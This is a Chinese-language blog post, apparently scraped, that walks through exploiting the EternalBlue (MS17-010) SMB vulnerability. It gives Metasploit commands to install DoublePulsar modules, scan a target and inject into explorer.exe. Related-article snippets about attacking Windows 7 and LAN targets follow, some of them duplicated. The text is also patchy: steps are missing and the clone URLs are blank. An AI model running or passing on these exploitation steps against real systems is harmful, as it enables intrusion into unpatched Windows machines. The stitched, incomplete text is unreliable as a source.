永恆之藍 EternalBlue 漏洞利用例項

2021-08-01 03:42:17 字數 689 閱讀 5267

1、公升級kali-rolling

a、修改更新源 vim /etc/apt/sources.list,只保留官方更新源「deb kali-rolling main non-free contrib」將其他更新源注釋掉;

b、更新 apt-get update && apt-get upgrade

git clone

攻擊模組:

git clone

將攻擊模組解壓,並將deps資料夾和eternalblue_doublepulsar.rb拷貝至/root/.msf/modules/exploits/windows/smb中;將掃瞄模組smb_ms17_010.rb拷貝至/root/.msf/modules/auxiliary/scanner/smb/中。

4、開啟msf

msfconsole

msfupdate

5、載入掃瞄模組並設定

use auxiliary/scanner/smb/smb_ms17_010

set rhosts ***.***.***.***

run6、載入攻擊模組

use exploits/windows/smb/eternalblue_doublepulsar

set rhost ***.***.***.***

set processinject explorer.exe

run

微軟EternalBlue永恆之藍漏洞攻擊測試

微軟ms17 010 理論 smbv1 漏洞攻擊,445埠。攻擊資源 攻擊工具包 點我 攻擊者系統 windows 7 ultimate x64 點我 受害者系統 windows 7 ultimate x64 點我,winxp,win2008,win2003均可。點我 輔助攻擊用系統 kali 點我...

微軟EternalBlue永恆之藍漏洞攻擊測試

微軟ms17 010 理論 smbv1 漏洞攻擊,445埠。攻擊資源 攻擊工具包 點我 攻擊者系統 windows 7 ultimate x64 點我 受害者系統 windows 7 ultimate x64 點我,winxp,win2008,win2003均可。點我 輔助攻擊用系統 kali 點我...

內網滲透(msf 永恆之藍漏洞)

準備工具 一台kall虛擬機器 擁有msf 一台win7虛擬機器 先使用msf的永恆之藍掃瞄模組對區域網進行掃瞄,可以掃瞄出區域網內符合條件的計算機資訊。這裡先推薦用nmap掃瞄區域網的存活機後,直接指定ip掃瞄把,用這個模板直接掃瞄整個區域網實在是太浪費時間了。在掃瞄出有著永恆之藍漏洞的計算機後,...